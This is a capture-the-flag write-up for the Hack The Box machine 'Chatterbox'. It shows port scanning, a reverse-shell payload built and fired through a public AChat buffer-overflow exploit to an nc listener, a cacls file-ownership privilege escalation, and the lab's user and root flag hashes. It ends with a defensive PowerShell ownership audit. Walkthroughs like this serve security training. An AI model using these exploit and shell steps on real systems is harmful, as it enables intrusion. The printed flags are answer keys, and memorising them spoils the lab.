

USER

[root:/git/htb/chatterbox]# nmap -Pn -n -sCV 10.10.10.74 --open (master✱)
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-26 10:20 CET
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.69 seconds

The normal nmap scan finds nothing. A UDP scan returns the same, nothing.

[root:/git/htb/chatterbox]# nmap -sU -sV --version-intensity 0 -F -n 10.10.10.74 (master✱)
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-26 10:24 CET
Nmap scan report for 10.10.10.74
Host is up (0.035s latency).
All 100 scanned ports on 10.10.10.74 are open|filtered

Expand the TCP scan to cover all ports.

[root:/git/htb/chatterbox]# nmap -p- -T5 10.10.10.74 (master✱)
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-26 10:33 CET
Nmap scan report for chatterbox.htb (10.10.10.74)
Host is up (0.034s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE
9255/tcp open  mon
9256/tcp open  unknown

Version and script scan to see if we can figure out anything more about the services:

[root:/git/htb/chatterbox]# nmap -sCV -p9255,9256 10.10.10.74 (master✱)
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-26 10:38 CET
Nmap scan report for chatterbox.htb (10.10.10.74)
Host is up (0.034s latency).

PORT     STATE SERVICE VERSION
9255/tcp open  http    AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   AChat chat system

[root:/git/htb/chatterbox]# curl 10.10.10.74:9255 (master✱)
[root:/git/htb/chatterbox]# curl 10.10.10.74:9256 (master✱)
curl: (1) Received HTTP/0.9 when not allowed

Googling for 'AChat enumerate port 9255 9256', I come across 'achat reverse tcp exploit'. After downloading the files, I modify the payload file to create a 'windows/shell_reverse_tcp' payload rather than meterpreter (no go in OSCP).

Generate the payload, edit the exploit file with the new buf data, and lastly change the server address in the script to our victim.

[root:/git/htb/chatterbox]# ./AChat_Payload.sh (master✱)
RHOST: 10.10.10.74
LHOST: 10.10.14.5
LPORT: 4488
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3767 bytes

[root:/git/htb/chatterbox]# python AChat_Exploit.py (master✱)
[+] BUFFER OVERFLOW PAYLOAD RELEASED – CHECK YOUR HANDLER

[root:/git/htb/chatterbox]# rlwrap nc -lvnp 4488 (master✱)
listening on [any] 4488 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.74] 49161
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
chatterbox\alfred

Grab user.txt:

C:\Users\Alfred\Desktop> type user.txt
02c94ad2f3a9d10f7f327b895249a2f8


ROOT

Once we have a reverse shell as Alfred, we notice that we have read access to the \Users\Administrator directory; usually other users don't have permission to enter this folder.

C:\Users\Administrator\Desktop> type root.txt
Access is denied.

Unfortunately we can't just print root.txt yet, but the permissions on the Administrator directory are a good place to start.

C:\Users\Administrator\Desktop> dir root.txt /q
03/26/2021  07:51 AM                34 CHATTERBOX\Alfred    root.txt

The /q switch lists the owner of each file, and root.txt is owned by Alfred. By default the owner of a file always retains the right to change its permissions, so Alfred can grant himself read access with cacls even though the current ACL denies it.

C:\Users\Administrator\Desktop> cacls root.txt /G Alfred:R
Are you sure (Y/N)? y
processed file: C:\Users\Administrator\Desktop\root.txt

C:\Users\Administrator\Desktop> type root.txt
efd540d3337ebc9d2682bec22ab89f45
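The privilege escalation above works only because a low-privileged user owns a file in the Administrator profile. The following PowerShell audit is an added example, not part of the writeup or of any tool it references; it assumes PowerShell 3.0 or later, and the directory path and list of trusted owners are assumptions a defender would adjust.

```powershell
# Added audit example, not part of the original writeup.
# Assumptions: PowerShell 3.0+, run with enough rights to read the ACLs under $Path.
# On Windows the owner of an object implicitly holds READ_CONTROL and WRITE_DAC,
# so a low-privileged owner can rewrite the DACL (exactly what 'cacls /G' did above)
# regardless of the current ACEs. This lists files in a sensitive directory whose
# owner is not a trusted principal.
param(
    [string]   $Path          = 'C:\Users\Administrator',   # directory to audit (assumed)
    [string[]] $TrustedOwners = @('BUILTIN\Administrators', # owners considered safe (assumed)
                                  'NT AUTHORITY\SYSTEM',
                                  'NT SERVICE\TrustedInstaller')
)

$findings = Get-ChildItem -Path $Path -Recurse -Force -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $acl = Get-Acl -LiteralPath $_.FullName -ErrorAction SilentlyContinue
        if ($null -eq $acl) { return }                 # unreadable ACL: nothing to report
        if ($TrustedOwners -notcontains $acl.Owner) {
            # Explicit ACEs for the owner, if any. An empty list means the owner relies
            # purely on implicit owner rights, which is still enough to take the file.
            $ownerAces = $acl.Access |
                Where-Object { $_.IdentityReference.Value -eq $acl.Owner } |
                ForEach-Object { "$($_.AccessControlType):$($_.FileSystemRights)" }
            [pscustomobject]@{
                File      = $_.FullName
                Owner     = $acl.Owner
                OwnerAces = ($ownerAces -join ', ')
            }
        }
    }

if ($findings) {
    $findings | Format-Table -AutoSize
    # Remediation (assumed desired state): return ownership to Administrators and
    # drop the untrusted principal's ACEs, e.g.
    #   icacls <file> /setowner "BUILTIN\Administrators"
    #   icacls <file> /remove:g <untrusted-user>
} else {
    "No files under $Path are owned by an untrusted principal."
}
```

Run against the box's C:\Users\Administrator, this would flag root.txt with owner CHATTERBOX\Alfred before any ACL change is made, which is the condition that makes the cacls step possible.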


INFORMATION

AChat Reverse TCP Exploit: https://github.com/EDB4YLI55/achat_reverse_tcp_exploit

File ownership Win7: https://superuser.com/questions/691578/how-to-display-change-the-owner-of-a-file-on-windows-7